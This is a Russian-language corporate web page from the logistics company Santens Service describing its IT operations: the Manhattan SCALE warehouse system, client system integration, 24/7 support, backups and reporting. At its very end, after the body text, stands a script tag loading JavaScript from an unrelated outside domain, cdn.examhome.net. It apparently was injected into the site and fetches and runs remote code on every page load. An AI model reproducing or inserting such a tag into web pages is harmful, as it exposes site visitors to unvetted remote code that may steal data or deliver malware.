IT-Обеспечение

СОБЫТИЯ

Ключевые положения

Департамент информационных технологий осуществляет свою деятельность в соответствии с политикой компании в области качества, политикой информационной безопасности и принципами ITSM

WMS

ГК «Сантэнс Сервис» управляет высоконагруженными складами, обслуживая клиентов с разными логистическими объемами и варьирующейся степенью сложности процессами. При высоких операционных нагрузках обеспечение таких параметров как высокая точность, скорость складской обработки продукции становится критической.

Для автоматизация управления складскими процессами клиентов используются система Manhattan SCALE.

WMS Manhattan SCALE отвечает возросшим потребностям наших клиентов. Выстроены и автоматизированы ключевые складские процессы с учетом логистических объемов, специфики бизнеса клиентов: приемка, размещение, хранение, обработка и отгрузка товаров.

Система решает задачи, реализуя не только текущие запросы, ее настройки позволяют адаптировать и расширить матрицу требований с перспективой развития бизнеса клиентов. Системы складского учета прошли квалификационную валидацию и в полном объеме соответствуют поставленным задачам – автоматизация и отслеживание цепочки операций с товаром.

Возможности интеграции с учетными системами клиентов

Большой практический опыт интеграции с разнообразными учетными системами, включая SAP, MS Dynamics NAV позволяет нам реализовывать технические задания клиентов разной степени сложности и глубины интеграции: от базовых складских потоков и до таких операций в режиме реального времени, как корректировки и смены статуса каждой тарной единицы.

При взаимодействии с клиентами, мы используем различные стратегии резервирования – FIFO, FEFO, LIFO, LEFO, Minimize visits, Maximize space и др., в совокупности, так и в обусловленном порядке приоритезации.

Используемый интеграционный интерфейс: собственная middleware-платформа и  MS BizTalk Server.

profile_empty

Заместитель операционного
директора по ИТ
Валиуллин Рустам Равильевич

тел.: +7 495 640 9669
info@santens.ru

Организация внутренних процессов ИТ

В целях повышения качества обслуживания, нашими специалистами постоянно проводится работа по оптимизации текущих и внедрение новых складских процессов.

Для складов, работающих круглосуточно, реализована техническая поддержка в режиме 24/7, с доступностью сервиса 98% в месяц.

Обеспечение непрерывности бизнеса

Безопасность и доступность сервисов обеспечивается резервированием аппаратного обеспечения и каналов связи, управлением доступа, оперативным контролем и долгосрочным хранением резервных копий.

Определенные складские процессы сопряжены с риском повышенной травмоопасности персонала и операторов техники.

Для предупреждения чрезвычайных ситуаций и обеспечения безопасности на всех складских комплексах установлены программы блокировки работы ПРТ в узко-проходных стеллажных аллеях во время работы комплектовщиков заказов.

Отчетность

Формы отчетности ориентированы на запросы клиентов и отражают операционную деятельность:

Клиенты — статистика по операциям и хранению, ABC-XYZ анализ и др.
Производство — BI аналитика, KPI производственного персонала и др.

<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>